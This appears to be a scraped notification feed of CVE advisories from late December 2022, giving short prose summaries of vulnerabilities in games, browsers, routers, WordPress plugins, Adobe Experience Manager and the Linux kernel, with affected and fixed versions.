🚨 CVE-2022-47949The Nintendo NetworkBuffer class, as used in Animal Crossing: New Horizons before 2.0.6 and other products, allows remote attackers to execute arbitrary code via a large UDP packet that causes a buffer overflow, aka ENLBufferPwn. The victim must join a game session with the attacker. Other affected products include Mario Kart 7 before 1.2, Mario Kart 8, Mario Kart 8 Deluxe before 2.1.0, ARMS before 5.4.1, Splatoon, Splatoon 2 before 5.5.1, Splatoon 3 before late 2022, Super Mario Maker 2 before 3.0.2, and Nintendo Switch Sports before late 2022.🎖@cveNotify |
|
| 2022-12-25 00:30:01 |
🚨 CVE-2022-47934Brave Browser before 1.43.88 allowed a remote attacker to cause a denial of service in private and guest windows via a crafted HTML file that mentions an ipfs:// or ipns:// URL. This is caused by an incomplete fix for CVE-2022-47932 and CVE-2022-47934.🎖@cveNotify |
|
| 2022-12-25 00:30:00 |
🚨 CVE-2020-36624A vulnerability was found in ahorner text-helpers up to 1.0.x. It has been declared as critical. This vulnerability affects unknown code of the file lib/text_helpers/translation.rb. The manipulation of the argument link leads to use of web link to untrusted target with window.opener access. The attack can be initiated remotely. Upgrading to version 1.1.0 is able to address this issue. The name of the patch is 184b60ded0e43c985788582aca2d1e746f9405a3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216520.🎖@cveNotify |
|
| 2022-12-25 00:29:58 |
🚨 CVE-2022-4637A vulnerability classified as problematic has been found in ep3-bs up to 1.7.x. This affects an unknown part. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.8.0 is able to address this issue. The name of the patch is ef49e709c8adecc3a83cdc6164a67162991d2213. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216495.🎖@cveNotify |
|
| 2022-12-25 00:29:57 |
🚨 CVE-2022-4643A vulnerability was found in docconv up to 1.2.0. It has been declared as critical. This vulnerability affects the function ConvertPDFImages of the file pdf_ocr.go. The manipulation of the argument path leads to os command injection. The attack can be initiated remotely. Upgrading to version 1.2.1 is able to address this issue. The name of the patch is b19021ade3d0b71c89d35cb00eb9e589a121faa5. It is recommended to upgrade the affected component. VDB-216502 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 00:29:56 |
🚨 CVE-2020-36620A vulnerability was found in Brondahl EnumStringValues up to 4.0.0. It has been declared as problematic. This vulnerability affects the function GetStringValuesWithPreferences_Uncache of the file EnumStringValues/EnumExtensions.cs. The manipulation leads to resource consumption. Upgrading to version 4.0.1 is able to address this issue. The name of the patch is c0fc7806beb24883cc2f9543ebc50c0820297307. It is recommended to upgrade the affected component. VDB-216466 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 00:29:55 |
🚨 CVE-2022-4632A vulnerability has been found in Auto Upload Images up to 3.3.0 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 3.3.1 is able to address this issue. The name of the patch is 895770ee93887ec78429c78ffdfb865bee6f9436. It is recommended to upgrade the affected component. The identifier VDB-216481 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 00:29:53 |
🚨 CVE-2022-4633A vulnerability was found in Auto Upload Images up to 3.3.0 and classified as problematic. Affected by this issue is some unknown functionality of the file src/setting-page.php of the component Settings Handler. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 3.3.1 is able to address this issue. The name of the patch is 895770ee93887ec78429c78ffdfb865bee6f9436. It is recommended to upgrade the affected component. VDB-216482 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 00:29:52 |
🚨 CVE-2021-4259A vulnerability was found in phpRedisAdmin up to 1.16.1. It has been classified as problematic. This affects the function authHttpDigest of the file includes/login.inc.php. The manipulation of the argument response leads to use of wrong operator in string comparison. Upgrading to version 1.16.2 is able to address this issue. The name of the patch is 31aa7661e6db6f4dffbf9a635817832a0a11c7d9. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216267.🎖@cveNotify |
|
| 2022-12-25 00:29:51 |
🚨 CVE-2022-4607A vulnerability was found in 3D City Database OGC Web Feature Service up to 5.2.0. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to xml external entity reference. Upgrading to version 5.2.1 is able to address this issue. The name of the patch is 246f4e2a97ad81491c00a7ed72ce5e7c7f75050a. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216215.🎖@cveNotify |
|
| 2022-12-25 00:29:50 |
🚨 CVE-2021-4250A vulnerability classified as problematic has been found in cgriego active_attr up to 0.15.2. This affects the function call of the file lib/active_attr/typecasting/boolean_typecaster.rb of the component Regex Handler. The manipulation of the argument value leads to denial of service. The exploit has been disclosed to the public and may be used. Upgrading to version 0.15.3 is able to address this issue. The name of the patch is dab95e5843b01525444b82bd7b336ef1d79377df. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216207.🎖@cveNotify |
|
| 2022-12-25 00:29:49 |
🚨 CVE-2022-4604A vulnerability classified as problematic was found in wp-english-wp-admin Plugin up to 1.5.1. Affected by this vulnerability is the function register_endpoints of the file english-wp-admin.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. Upgrading to version 1.5.2 is able to address this issue. The name of the patch is ad4ba171c974c65c3456e7c6228f59f40783b33d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216199.🎖@cveNotify |
|
| 2022-12-25 00:29:48 |
🚨 CVE-2022-4588A vulnerability, which was classified as problematic, was found in Boston Sleep slice up to 84.1.x. Affected is an unknown function of the component Layout Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 84.2.0 is able to address this issue. The name of the patch is 6523bb17d889e2ab13d767f38afefdb37083f1d0. It is recommended to upgrade the affected component. VDB-216174 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 00:29:47 |
🚨 CVE-2022-4589A vulnerability has been found in cyface Terms and Conditions Module up to 2.0.9 and classified as problematic. Affected by this vulnerability is the function returnTo of the file termsandconditions/views.py. The manipulation leads to open redirect. The attack can be launched remotely. Upgrading to version 2.0.10 is able to address this issue. The name of the patch is 03396a1c2e0af95e12a45c5faef7e47a4b513e1a. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216175.🎖@cveNotify |
|
| 2022-12-25 00:29:46 |
🚨 CVE-2022-4560A vulnerability was found in Joget up to 7.0.31. It has been rated as problematic. This issue affects the function getInternalJsCssLib of the file wflow-core/src/main/java/org/joget/plugin/enterprise/UniversalTheme.java of the component wflow-core. The manipulation of the argument key leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 7.0.32 is able to address this issue. The name of the patch is ecf8be8f6f0cb725c18536ddc726d42a11bdaa1b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-215963.🎖@cveNotify |
|
| 2022-12-25 00:29:44 |
🚨 CVE-2022-4564A vulnerability classified as problematic has been found in University of Central Florida Materia up to 9.0.0. This affects the function before of the file fuel/app/classes/controller/api.php of the component API Controller. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 9.0.1-alpha1 is able to address this issue. The name of the patch is af259115d2e8f17068e61902151ee8a9dbac397b. It is recommended to upgrade the affected component. The identifier VDB-215973 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 00:29:43 |
🚨 CVE-2022-4521A vulnerability classified as problematic has been found in WSO2 carbon-registry up to 4.8.6. This affects an unknown part of the component Request Parameter Handler. The manipulation of the argument parentPath/path/username/path/profile_menu leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 4.8.7 is able to address this issue. The name of the patch is 9f967abfde9317bee2cda469dbc09b57d539f2cc. It is recommended to upgrade the affected component. The identifier VDB-215901 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 00:29:42 |
🚨 CVE-2022-4524A vulnerability, which was classified as problematic, was found in Roots soil Plugin up to 4.0.x. Affected is the function language_attributes of the file src/Modules/CleanUpModule.php. The manipulation of the argument language leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 4.1.0 is able to address this issue. The name of the patch is 0c9151e00ab047da253e5cdbfccb204dd423269d. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215904.🎖@cveNotify |
|
| 2022-12-25 00:29:41 |
🚨 CVE-2022-4525A vulnerability has been found in National Sleep Research Resource sleepdata.org up to 58.x and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 59.0.0.rc is able to address this issue. The name of the patch is da44a3893b407087829b006d09339780919714cd. It is recommended to upgrade the affected component. The identifier VDB-215905 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 00:29:40 |
🚨 CVE-2022-4527A vulnerability was found in collective.task up to 3.0.8. It has been classified as problematic. This affects the function renderCell/AssignedGroupColumn of the file src/collective/task/browser/table.py. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 3.0.9 is able to address this issue. The name of the patch is 1aac7f83fa2c2b41d59ba02748912953461f3fac. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-215907.🎖@cveNotify |
|
| 2022-12-25 00:29:39 |
🚨 CVE-2022-4495A vulnerability, which was classified as problematic, has been found in collective.dms.basecontent up to 1.6. This issue affects the function renderCell of the file src/collective/dms/basecontent/browser/column.py. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 1.7 is able to address this issue. The name of the patch is 6c4d616fcc771822a14ebae5e23f3f6d96d134bd. It is recommended to upgrade the affected component. The identifier VDB-215813 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-24 21:29:42 |
🚨 CVE-2022-4647Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.3.2.🎖@cveNotify |
|
| 2022-12-24 21:29:38 |
🚨 CVE-2022-43382IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a local user with elevated privileges to exploit a vulnerability in the lpd daemon to cause a denial of service. IBM X-Force ID: 238641.🎖@cveNotify |
|
| 2022-12-24 21:29:37 |
🚨 CVE-2022-38391IBM Spectrum Control 5.4 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 233982.🎖@cveNotify |
|
| 2022-12-24 21:29:36 |
🚨 CVE-2022-47629Libksba before 1.6.3 is prone to an integer overflow vulnerability in the CRL signature parser.🎖@cveNotify |
|
| 2022-12-24 07:29:59 |
🚨 CVE-2022-46530Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the mac parameter at /goform/GetParentControlInfo.🎖@cveNotify |
|
| 2022-12-24 07:29:58 |
🚨 CVE-2022-46532Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the deviceMac parameter at /goform/addWifiMacFilter.🎖@cveNotify |
|
| 2022-12-24 07:29:57 |
🚨 CVE-2022-45665Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the funcpara1 parameter in the formSetCfm function.🎖@cveNotify |
|
| 2022-12-24 07:29:55 |
🚨 CVE-2022-45666Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the list parameter in the formwrlSSIDset function.🎖@cveNotify |
|
| 2022-12-24 07:29:54 |
🚨 CVE-2022-46533Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the limitSpeed parameter at /goform/SetClientState.🎖@cveNotify |
|
| 2022-12-24 07:29:53 |
🚨 CVE-2022-46550Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the urls parameter at /goform/saveParentControlInfo.🎖@cveNotify |
|
| 2022-12-24 07:29:52 |
🚨 CVE-2022-46551Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the time parameter at /goform/saveParentControlInfo.🎖@cveNotify |
|
| 2022-12-24 07:29:51 |
🚨 CVE-2022-47500URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Apache Software Foundation Apache Helix UI component.This issue affects Apache Helix all releases from 0.8.0 to 1.0.4. Solution: removed the the forward component since it was improper designed for UI embedding. User please upgrade to 1.1.0 to fix this issue.🎖@cveNotify |
|
| 2022-12-24 07:29:50 |
🚨 CVE-2022-40743Improper Input Validation vulnerability for the xdebug plugin in Apache Software Foundation Apache Traffic Server can lead to cross site scripting and cache poisoning attacks.This issue affects Apache Traffic Server: 9.0.0 to 9.1.3. Users should upgrade to 9.1.4 or later versions.🎖@cveNotify |
|
| 2022-12-24 07:29:48 |
🚨 CVE-2022-46322Some smartphones have the out-of-bounds write vulnerability. Successful exploitation of this vulnerability may cause system service exceptions.🎖@cveNotify |
|
| 2022-12-24 07:29:47 |
🚨 CVE-2022-46323Some smartphones have the out-of-bounds write vulnerability.Successful exploitation of this vulnerability may cause system service exceptions.🎖@cveNotify |
|
| 2022-12-24 07:29:46 |
🚨 CVE-2022-46324Some smartphones have the out-of-bounds write vulnerability. Successful exploitation of this vulnerability may cause system service exceptions.🎖@cveNotify |
|
| 2022-12-24 07:29:45 |
🚨 CVE-2022-46325Some smartphones have the out-of-bounds write vulnerability.Successful exploitation of this vulnerability may cause system service exceptions.🎖@cveNotify |
|
| 2022-12-24 07:29:44 |
🚨 CVE-2022-46326Some smartphones have the out-of-bounds write vulnerability. Successful exploitation of this vulnerability may cause system service exceptions.🎖@cveNotify |
|
| 2022-12-24 07:29:43 |
🚨 CVE-2022-46320The kernel module has an out-of-bounds read vulnerability. Successful exploitation of this vulnerability may cause memory overwriting.🎖@cveNotify |
|
| 2022-12-24 07:29:42 |
🚨 CVE-2022-46321The Wi-Fi module has a vulnerability in permission verification. Successful exploitation of this vulnerability may affect data confidentiality.🎖@cveNotify |
|
| 2022-12-24 07:29:41 |
🚨 CVE-2022-46327Some smartphones have configuration issues. Successful exploitation of this vulnerability may cause privilege escalation, which results in system service exceptions.🎖@cveNotify |
|
| 2022-12-24 07:29:40 |
🚨 CVE-2022-46328Some smartphones have the input validation vulnerability. Successful exploitation of this vulnerability may affect data confidentiality.🎖@cveNotify |
|
| 2022-12-24 07:29:39 |
🚨 CVE-2022-46175JSON5 is an extension to the popular JSON file format that aims to be easier to write and maintain by hand (e.g. for config files). The `parse` method of the JSON5 library before and including version `2.2.1` does not restrict parsing of keys named `__proto__`, allowing specially crafted strings to pollute the prototype of the resulting object. This vulnerability pollutes the prototype of the object returned by `JSON5.parse` and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations. This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from `JSON5.parse`. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution. `JSON5.parse` should restrict parsing of `__proto__` keys when parsing JSON strings to objects. As a point of reference, the `JSON.parse` method included in JavaScript ignores `__proto__` keys. Simply changing `JSON5.parse` to `JSON.parse` in the examples above mitigates this vulnerability. This vulnerability is patched in json5 version 2.2.2 and later.🎖@cveNotify |
|
| 2022-12-24 07:29:38 |
🚨 CVE-2022-46315The ProfileSDK has defects introduced in the design process. Successful exploitation of this vulnerability may affect system availability.🎖@cveNotify |
|
| 2022-12-24 01:29:41 |
🚨 CVE-2022-22449IBM Security Verify Governance, Identity Manager 10.01 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 224915.🎖@cveNotify |
|
| 2022-12-24 01:29:38 |
🚨 CVE-2022-38658BigFix deployments that have installed the Notification Service on Windows are susceptible to disclosing SMTP BigFix operator's sensitive data in clear text. Operators who use Notification Service related content from BES Support are at risk of leaving their SMTP sensitive data exposed.🎖@cveNotify |
|
| 2022-12-24 01:29:37 |
🚨 CVE-2022-43860IBM Navigator for i 7.3, 7.4, and 7.5 could allow an authenticated user to obtain sensitive information they are authorized to but not while using this interface. By performing an SQL injection an attacker could see user profile attributes through this interface. IBM X-Force ID: 239305.🎖@cveNotify |
|
| 2022-12-24 01:29:36 |
🚨 CVE-2022-40011Cross Site Scripting (XSS) vulnerability in typora through 1.38 allows remote attackers to run arbitrary code via export from editor.🎖@cveNotify |
|
| 2022-12-24 01:29:35 |
🚨 CVE-2022-47633An image signature validation bypass vulnerability in Kyverno 1.8.3 and 1.8.4 allows a malicious image registry (or a man-in-the-middle attacker) to inject unsigned arbitrary container images into a protected Kubernetes cluster. This is fixed in 1.8.5. This has been fixed in 1.8.5 and mitigations are available for impacted releases.🎖@cveNotify |
|
| 2022-12-24 00:29:42 |
🚨 CVE-2022-28228Out-of-bounds read was discovered in YDB server. An attacker could construct a query with insert statement that would allow him to read sensitive information from other memory locations or cause a crash.🎖@cveNotify |
|
| 2022-12-24 00:29:41 |
🚨 CVE-2022-4610A vulnerability, which was classified as problematic, has been found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome. Affected by this issue is some unknown functionality. The manipulation leads to risky cryptographic algorithm. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-216272.🎖@cveNotify |
|
| 2022-12-24 00:29:37 |
🚨 CVE-2022-4612A vulnerability has been found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome and classified as problematic. This vulnerability affects unknown code. The manipulation leads to insufficiently protected credentials. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. VDB-216274 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-24 00:29:36 |
🚨 CVE-2022-4613A vulnerability was found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome and classified as critical. This issue affects some unknown processing of the component Browser Extension Provisioning. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216275.🎖@cveNotify |
|
| 2022-12-23 22:29:57 |
🚨 CVE-2022-45707IP-COM M50 V15.11.0.33(10768) was discovered to contain a buffer overflow via the rules parameter in the formAddDnsHijack function.🎖@cveNotify |
|
| 2022-12-23 22:29:56 |
🚨 CVE-2022-39164IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 235181.🎖@cveNotify |
|
| 2022-12-23 22:29:55 |
🚨 CVE-2022-43848IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX perfstat kernel extension to cause a denial of service. IBM X-Force ID: 239169.🎖@cveNotify |
|
| 2022-12-23 22:29:51 |
🚨 CVE-2022-43849IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in the AIX pfcdd kernel extension to cause a denial of service. IBM X-Force ID: 239170.🎖@cveNotify |
|
| 2022-12-23 22:29:50 |
🚨 CVE-2022-47943An issue was discovered in ksmbd in the Linux kernel before 5.19.2. There is an out-of-bounds read and OOPS for SMB2_WRITE, when there is a large length in the zero DataOffset case.🎖@cveNotify |
|
| 2022-12-23 22:29:49 |
🚨 CVE-2022-45709IP-COM M50 V15.11.0.33(10768) was discovered to contain multiple command injection vulnerabilities via the pEnable, pLevel, and pModule parameters in the formSetDebugCfg function.🎖@cveNotify |
|
| 2022-12-23 22:29:45 |
🚨 CVE-2022-45710IP-COM M50 V15.11.0.33(10768) was discovered to contain multiple buffer overflows via the pEnable, pLevel, and pModule parameters in the formSetDebugCfg function.🎖@cveNotify |
|
| 2022-12-23 22:29:44 |
🚨 CVE-2022-45712IP-COM M50 V15.11.0.33(10768) was discovered to contain a buffer overflow via the rules parameter in the formAddDnsForward function.🎖@cveNotify |
|
| 2022-12-23 22:29:43 |
🚨 CVE-2022-45714IP-COM M50 V15.11.0.33(10768) was discovered to contain a buffer overflow via the indexSet parameter in the formQOSRuleDel function.🎖@cveNotify |
|
| 2022-12-23 22:29:42 |
🚨 CVE-2022-45715IP-COM M50 V15.11.0.33(10768) was discovered to contain multiple buffer overflows via the pLanPortRange and pWanPortRange parameters in the formSetPortMapping function.🎖@cveNotify |
|
| 2022-12-23 22:29:41 |
🚨 CVE-2022-45716IP-COM M50 V15.11.0.33(10768) was discovered to contain a buffer overflow via the indexSet parameter in the formIPMacBindDel function.🎖@cveNotify |
|
| 2022-12-23 22:29:40 |
🚨 CVE-2022-45717IP-COM M50 V15.11.0.33(10768) was discovered to contain a command injection vulnerability via the usbPartitionName parameter in the formSetUSBPartitionUmount function. This vulnerability is exploited via a crafted GET request.🎖@cveNotify |
|
| 2022-12-23 22:29:39 |
🚨 CVE-2022-45718IP-COM M50 V15.11.0.33(10768) was discovered to contain a buffer overflow via the rules parameter in the formIPMacBindAdd function.🎖@cveNotify |
|
| 2022-12-23 22:29:38 |
🚨 CVE-2022-45719IP-COM M50 V15.11.0.33(10768) was discovered to contain a buffer overflow via the gotoUrl parameter in the formPortalAuth function.🎖@cveNotify |
|
| 2022-12-23 22:29:37 |
🚨 CVE-2022-45720IP-COM M50 V15.11.0.33(10768) was discovered to contain multiple buffer overflows via the ip, mac, and remark parameters in the formIPMacBindModify function.🎖@cveNotify |
|
| 2022-12-23 19:30:06 |
🚨 CVE-2022-42364Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-23 19:30:05 |
🚨 CVE-2022-42365Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-23 19:30:04 |
🚨 CVE-2022-44463Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-23 19:30:03 |
🚨 CVE-2022-44465Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-23 19:30:01 |
🚨 CVE-2022-42348Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-23 19:30:00 |
🚨 CVE-2022-42349Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-23 19:29:58 |
🚨 CVE-2022-42350Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-23 19:29:57 |
🚨 CVE-2022-42354Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-23 19:29:54 |
🚨 CVE-2022-42356Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-23 19:29:53 |
🚨 CVE-2022-42345Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-23 19:29:49 |
🚨 CVE-2022-42346Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-23 19:29:48 |
🚨 CVE-2022-4609Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2022-12-23 19:29:47 |
🚨 CVE-2022-4061The JobBoardWP WordPress plugin before 1.2.2 does not properly validate file names and types in its file upload functionalities, allowing unauthenticated users to upload arbitrary files such as PHP.🎖@cveNotify |
|
| 2022-12-23 19:29:46 |
🚨 CVE-2022-38662In HCL Digital Experience, URLs can be constructed to redirect users to untrusted sites.🎖@cveNotify |
|
| 2022-12-23 19:29:42 |
🚨 CVE-2022-4106The Wholesale Market for WooCommerce WordPress plugin before 1.0.7 does not have authorisation check, as well as does not validate user input used to generate system path, allowing unauthenticated attackers to download arbitrary file from the server.🎖@cveNotify |
|
| 2022-12-23 19:29:41 |
🚨 CVE-2020-35476A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.)🎖@cveNotify |
|
| 2022-12-23 19:29:40 |
🚨 CVE-2022-4112The Quizlord WordPress plugin through 2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-12-23 19:29:39 |
🚨 CVE-2022-38659In specific scenarios, on Windows the operator credentials may be encrypted in a manner that is not completely machine-dependent.🎖@cveNotify |
|
| 2022-12-23 18:30:06 |
🚨 CVE-2022-3705A vulnerability was found in vim and classified as problematic. Affected by this issue is the function qf_update_buffer of the file quickfix.c of the component autocmd Handler. The manipulation leads to use after free. The attack may be launched remotely. Upgrading to version 9.0.0805 is able to address this issue. The name of the patch is d0fab10ed2a86698937e3c3fed2f10bd9bb5e731. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-212324.🎖@cveNotify |
|
| 2022-12-23 18:30:05 |
🚨 CVE-2022-3564A vulnerability classified as critical was found in Linux Kernel. Affected by this vulnerability is the function l2cap_reassemble_sdu of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211087.🎖@cveNotify |
|
| 2022-12-23 18:30:04 |
🚨 CVE-2022-3165An integer underflow issue was found in the QEMU VNC server while processing ClientCutText messages in the extended format. A malicious client could use this flaw to make QEMU unresponsive by sending a specially crafted payload message, resulting in a denial of service.🎖@cveNotify |
|
| 2022-12-23 18:30:03 |
🚨 CVE-2022-3545A vulnerability has been found in Linux Kernel and classified as critical. Affected by this vulnerability is the function area_cache_get of the file drivers/net/ethernet/netronome/nfp/nfpcore/nfp_cppcore.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211045 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-23 18:30:02 |
🚨 CVE-2022-2938A flaw was found in the Linux kernel's implementation of Pressure Stall Information. While the feature is disabled by default, it could allow an attacker to crash the system or have other memory-corruption side effects.🎖@cveNotify |
|
| 2022-12-23 18:30:01 |
🚨 CVE-2021-46784In Squid 3.x through 3.5.28, 4.x through 4.17, and 5.x before 5.6, due to improper buffer management, a Denial of Service can occur when processing long Gopher server responses.🎖@cveNotify |
|
| 2022-12-23 16:29:44 |
🚨 CVE-2022-4108The Wholesale Market for WooCommerce WordPress plugin before 1.0.8 does not validate user input used to generate system path, allowing high privilege users such as admin to download arbitrary file from the server even when they should not be able to (for example in multisite)🎖@cveNotify |
|
| 2022-12-23 16:29:40 |
🚨 CVE-2022-4107The SMSA Shipping for WooCommerce WordPress plugin before 1.0.5 does not have authorisation and proper CSRF checks, as well as does not validate the file to be downloaded, allowing any authenticated users, such as subscriber to download arbitrary file from the server🎖@cveNotify |
|
| 2022-12-23 16:29:39 |
🚨 CVE-2014-6230WP-Ban plugin before 1.6.4 for WordPress, when running in certain configurations, allows remote attackers to bypass the IP blacklist via a crafted X-Forwarded-For header.🎖@cveNotify |
|
| 2022-12-23 16:29:38 |
🚨 CVE-2022-46171Tauri is a framework for building binaries for all major desktop platforms. The filesystem glob pattern wildcards `*`, `?`, and `[...]` match file path literals and leading dots by default, which unintentionally exposes sub folder content of allowed paths. Scopes without the wildcards are not affected. As `**` allows for sub directories the behavior there is also as expected. The issue has been patched in the latest release and was backported into the currently supported 1.x branches. There are no known workarounds at the time of publication.🎖@cveNotify |
|
| 2022-12-23 16:29:37 |
🚨 CVE-2022-47524F-Secure SAFE Browser 19.1 before 19.2 for Android allows an IDN homograph attack.🎖@cveNotify |
|
| 2022-12-23 16:29:36 |
🚨 CVE-2022-3691The DeepL Pro API translation plugin WordPress plugin before 1.7.5 discloses sensitive information (including the DeepL API key) in files that are publicly accessible to an external, unauthenticated visitor.🎖@cveNotify |
|
| 2022-12-23 14:29:45 |
🚨 CVE-2022-4683Sensitive Cookie in HTTPS Session Without 'Secure' Attribute in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2022-12-23 14:29:44 |
🚨 CVE-2022-4684Improper Access Control in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2022-12-23 14:29:43 |
🚨 CVE-2022-4685Improper Access Control in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2022-12-23 14:29:39 |
